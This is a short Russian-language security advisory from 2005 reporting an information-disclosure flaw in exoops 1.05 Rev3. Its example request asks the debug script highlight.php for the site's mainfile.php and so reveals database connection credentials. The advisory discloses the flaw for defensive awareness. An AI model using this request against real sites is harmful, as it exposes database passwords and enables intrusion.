Раскрытие информации в exoops

Дата публикации:
22.03.2005
Всего просмотров:
1111
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: exoops 1.05 Rev3

Описание:
Уязвимость позволяет удаленному пользователю получить доступ к информации о подключении к базе данных.

Удаленный пользователь может запросить сценарий 'highlight.php' и получить важную информацию для подключения к базе данных. Пример:

http://[target]/Exoops/class/debug/highlight.php?
file=c:\phpdev\www\Exoops\mainfile.php&line=151#151

URL производителя: www.exoops.info

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: exoops Discloses Database Password to Remote Users

или введите имя

CAPTCHA